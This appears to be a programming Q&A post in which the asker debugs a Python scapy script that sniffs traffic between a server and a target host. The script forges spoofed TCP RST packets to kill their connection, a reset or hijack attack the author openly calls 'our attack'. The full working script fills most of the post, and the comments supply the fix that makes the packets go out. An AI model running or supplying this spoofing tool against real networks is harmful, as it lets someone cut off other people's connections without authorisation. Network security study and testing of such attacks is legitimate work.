# scapy remaining packets, not received

Tags: python, networking, tcp, scapy

I've got an issue with scapy, it says :

```
Finished to send 1 packets
```

But I don't receive anything on tcpdump, and when i close scapy:

```
Received 0 packets, got 0 answers, remaining 1 packets
```

What does "remaining 1 packets" means? 
Here is the code :

```
#Usage: script.py serveur_ip serveur_port client_ip
from scapy.all import *
import sys

#Création of the filter for the sniffer
filtre="host " + sys.argv[1] + " and port " + sys.argv[2]
print "THe filter used will be : {}".format(filtre)

#Function used by the sniffer for each received packet:
def rst_hijack(p):
    #If the source is the remote-host and the destination is the target
    if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
        print "Connexion trouvée"
        #We forge a packet for our attack from the received packet
        #Ethernet
        ether=Ether(dst=p[Ether].src, src=p[Ether].dst)
        ether.show()
        #IP
        ip=IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,
            proto=p[IP].proto, id=29221)
        ip.show()
        #TCP
        tcp=TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs,
            reserved=p[TCP].reserved, flags="R", window=p[TCP].window, options=p[TCP].options)
        tcp.show()
        #We forge the final paquet
        reset=ether/ip/tcp
        reset.show()
        #We send it
        srp(reset)
        exit()

#Sniffer That applies to each packet the rst_hijack function, packet filtered according to the filter
sniff(count=0, iface="ens37", prn=lambda p: rst_hijack(p), filter=filtre, lfilter=lambda x: x.haslayer(IP) and x.haslayer(TCP))
```

Comment: when you run a tcpdump "tcpdump icmp" on the client side, do you see any packets leaving to the dest host?

Comment: can you show your python script?

Comment: @mr4kino I've just add the code to the post. Trying the tcpdump icmp now, but I'm not using any ICMP

Comment: @mr4kino Well fixed it by sending the paquet without the ethernet part (removed the ethernet part and send it with send() ). I don't know why but it was received. And then I've put back the ethernet part and it worked too. If don't have any idea why.